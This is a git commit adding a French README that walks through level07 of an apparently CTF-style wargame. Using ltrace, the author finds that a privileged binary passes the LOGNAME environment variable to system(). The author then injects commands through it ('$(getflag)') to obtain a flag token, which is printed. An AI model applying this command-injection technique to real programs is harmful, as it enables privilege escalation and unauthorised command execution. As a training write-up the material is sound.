docs(lvl07): adding the readme
This commit is contained in:
Raphael
parent
6ddb3f1261
commit
174b2510e1
1 changed files with 46 additions and 0 deletions
46
level07/README.md
Normal file
46
level07/README.md
Normal file
|
|
@ -0,0 +1,46 @@
|
|||
Lors de mon arriver sur le level07 je fait un petit check des fichiers
|
||||
|
||||
Je vois un level07 qui est un executable
|
||||
|
||||
Je commence par faire un petit ltrace (pour regarder les librairies appeler)
|
||||
|
||||
```c
|
||||
ltrace ./level07
|
||||
__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 <unfinished ...>
|
||||
getegid() = 2007
|
||||
geteuid() = 2007
|
||||
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0
|
||||
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0
|
||||
getenv("LOGNAME") = "level07"
|
||||
asprintf(0xbffff744, 0x8048688, 0xbfffff4f, 0xb7e5ee55, 0xb7fed280) = 18
|
||||
system("/bin/echo level07 "level07
|
||||
<unfinished ...>
|
||||
--- SIGCHLD (Child exited) ---
|
||||
<... system resumed> ) = 0
|
||||
+++ exited (status 0) +++
|
||||
```
|
||||
|
||||
Et je remarque que getenv et appeler sur LOGNAME je tente donc une modification et:
|
||||
|
||||
```bash
|
||||
export LOGNAME='hello'
|
||||
|
||||
./level07
|
||||
hello
|
||||
```
|
||||
|
||||
Mais il est donc egallement possible d'executer des commandes
|
||||
|
||||
```bash
|
||||
export LOGNAME='$(echo hello)'
|
||||
./level07
|
||||
hello
|
||||
```
|
||||
|
||||
Donc forcement il est possible de lancer getflag
|
||||
|
||||
```bash
|
||||
export LOGNAME='$(getflag)'
|
||||
./level07
|
||||
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
|
||||
```
|
||||
Loading…
Add table
Add a link
Reference in a new issue